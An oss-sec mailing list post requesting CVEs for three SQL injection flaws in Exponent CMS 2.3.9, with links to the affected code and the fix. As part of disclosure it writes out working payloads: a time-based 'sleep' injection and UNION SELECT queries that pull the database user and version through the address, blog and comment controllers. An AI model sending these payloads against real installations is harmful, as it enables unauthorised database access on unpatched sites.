oss-sec mailing list archives
CVE request:Exponent CMS 2.3.9 SQL injection vulnerabilities
From: felix k3y <felixk3y () gmail com>
Date: Sun, 18 Sep 2016 12:09:04 +0800
Hi, I reported the following SQL Injection vulnerabilities to the ExponentCMS team on Sep 13, 2016: 1) https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/addressbook/controllers/addressController.php#L166-L175 2) https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/blog/controllers/blogController.php#L192-L195 3) https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/core/controllers/expCommentController.php#L129-L134 /index.php?controller=address&action=activate_address In the first case, you can sending "id=1 and if(1,sleep(1),0)%23" in the POST data of an HTTP request; /index.php?controller=blog&action=show&title=xx' union select 1,user(),3,4,5,6,7,8,9,0,11,2,3,4,5,6,7,8,9,0%23 In the second, you can sending "title=xx' union select 1,user(),3,4,5,6,7,8,9,0,11,2,3,4,5,6,7,8,9,0%23" in the GET data of an HTTP request; /index.php?controller=expComment&action=showComments&content_id=11%20union%20select%201,2,3,4,version(),6,7,8,9,10,11--%20s&config[disable_nested_comments]=1 In the last one , you can sending "content_id=11%20union%20select%201,2,3,4,version(),6,7,8,9,10,11--%20s" in the GET data of an HTTP request. And Now, all SQL Injection vulnerabilityies have been fixed. https://exponentcms.lighthouseapp.com/projects/61783/changesets/e916702a91a6342bbab483a2be2ba2f11dca3aa3 https://github.com/exponentcms/exponent-cms/commit/e916702a91a6342bbab483a2be2ba2f11dca3aa3 I would like to request CVEs for those issues (if not done so). thx. -------------------------------------- felixk3y#gmail.com penghua#silence.com.cn PKAV Team
Current thread:
- CVE request:Exponent CMS 2.3.9 SQL injection vulnerabilities felix k3y (Sep 17)
- Re: CVE request : Exponent CMS 2.3.9 SQL injection vulnerabilities cve-assign (Sep 18)